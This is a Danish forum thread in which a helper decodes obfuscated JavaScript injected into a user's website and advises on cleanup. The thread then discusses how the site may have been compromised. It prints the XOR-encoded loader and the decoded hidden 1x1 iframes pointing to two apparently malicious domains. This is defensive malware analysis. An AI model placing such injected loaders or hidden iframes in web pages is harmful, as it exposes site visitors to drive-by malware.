hvad er dette?

Hej jan2001,


Det er noget kode som sandsynligvis er blevet injected ind i din side. Hvis du kigger på 'str1' variablen indeholder den en kodet streng. Scriptet der kommer herefter (altså for-løkken og unescape) bruges så til at afkode 'str1' strengen til noget eksekverbar javascript. Du har faktisk fået samme type script injected to gange på din side (Du kan se der er to par af <script></script>).

Jeg har lige ryddet lidt op i det føste script så man kan se hvad der foregår og erstattet document.write(str) med print(str):


e = '0x00' + '24';

str1 = "%9F%C7%CC%D1%BB%D6%D7%DC%CF%C0%98%85%D1%CC%D6%CC%C5%CC%CF%CC%D7%DC%9D%C3%CC%C7%C7%C0%C9%85%99%9F%CC%C1%D5%C4%C8%C0%BB%D6%D5%C6%98%85%C3%D7%D7%CB%9D%8A%8A%D6%D0%D1%C6%C9%D7%89%C6%CA%C8%8A%CF%C7%8A%D0%CB%CF%8A%85%BB%D2%CC%C7%D7%C3%98%94%BB%C3%C0%CC%C2%C3%D7%98%94%99%9F%8A%CC%C1%D5%C4%C8%C0%99%9F%8A%C7%CC%D1%99";

str=tmp='';

for(i=0;i<str1.length;i+=3)
{
  tmp = unescape(str1.slice(i,i+3));
  str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}

print(str);


Køres dette stykke javascript får man (altså afkoder man 'str1'):


<div style="visibility:hidden"><iframe src="http://suvcnt.com/ld/upl/" width=1 height=1></iframe></div>


Så hvad alt det første javascript gør er at lave en iframe på din side med src til en sikkert ikke så sjov html-side. Du er så blevet hårdede ramt fordi der er to scripts lige efter hinanden, dette bruges typisk til at downloade et Visual Basic script der downloader en malware exe-fil. :/... Oversætter man (i dit tilfælde) det andet script er det dog også en iframe med en src til en anden side:


<div style="visibility:hidden"><iframe src="http://grigcnt.info/ld/upl/" width=1 height=1></iframe></div>


Mit råd er så selvfølgelig hurtigst muligt at slette scriptet så brugerne ikke får diverse trojans, malware eller andet ind på deres computere. Jeg har ikke prøvet nogen af de to links som javascriptet refererer til, men kunne måske være sjovt at gøre fra en virtual-PC (vil ihvertfald stærkt fraråde dig at gøre det fra din egen pc). :)


(Damn them exploiters)  ;)


Mvh.

- Snap :)

Mange tak. Det var da godt jeg opdagede den. Vil en dag prøve at kigge på linket fra en andet pc end min egen.
Men jeg gad vide hvordan koden er blevet sat ind i html-filen. Et er at få et script til at lave sjove ting, men noget andet er at få lov til at skrive på en sikret server. Men det kan man åbenbart.

Hej jan,

Ja, det man sige (at det var godt du opdagede det)! :)

At finde sådan noget javascript på sin index side er typisk en indikation af et sikkerhedshul i sin web-server. Vær sikker på at alle patches er blevet installeret og skift måske dine login passwords?! I meget slemme tilfælde er man måske nødt til at geninstallere serveren hvis der er blevet installeret nogen backdoors man ikke kender til (og kan finde).

Du blive bare nødt til at se om alt er "up to date" på serveren, køre diverse spyware programmer og holde øje med om lignende javascript sniger sig ind på dine sider fremover. :/...


Held og lykke med det! :)


Mvh.

- Snap

Jeg kan så ikke gøre meget andet end kontakte hosten som er one.com

Jeg fandt fejlen med linkscanner. Alt skulle være opdateret nu.
Bare kedeligt at google har stemplet mit site som farligt.

<ole>

Hvis du har PHP- eller VB-scripts liggende på serveren, skal du nok også lade dem se efter af nogen med god indsigt i serversikkerhed. Det er utroligt, hvad man ofte kan få lov at uploade, skrive og inkludere af filer, hvis man er lidt kreativ

/mvh
</bole>

Har haft kontakt med one.com. De påstod at deres server var meget sikker, men at det kunne være gennem en eller anden phpforum eller lignende. Eller at vedkommende havde fået fat på password til ftp via spyware, virus mm.
Men det er jo svært at garderer sig med det fremover. Jeg har flere dynamiske sidder på mit website. Mit lazarus gæstebog er dog blevet hacked før. Men programmøren påstår at den er sikker. Så det er ikke nemt.

Det er nemt nok, post koden så checker vi den :p

Sandsyneligvis tillader din gæstebog bare html , hvilket dette her jo var. Det er ikke en sikkerhedsfejl , men nærmere en test-fejl.

Og ja, det er på ingen måde one.com's skyld.

nej, min gæstebog tillader ikke html.

Jeg må vist bare holde øje med om der har været en hacker på spil. Tak for oversættelse af kode.

Ja, hackere kan stort set altid finde en vej gennem ens sikkerhed hvis de virkelig vil.. :/


Og det var så lidt, tak for pointene.. :)


Mvh.

- Snap

Husk også på, at når/hvis du bruger færdige gratis-scripts (forum, gæstebog, m.m.), så har forbryderne de bedst tænkelige 'landkort' over det område, de skal indtage.

Tro i øvrigt aldrig en koder, når han siger, hans script er sikkert! Han tror det måske selv - men virkeligheden (herunder Eksperten-tråde) siger ofte noget helt andet  ;o)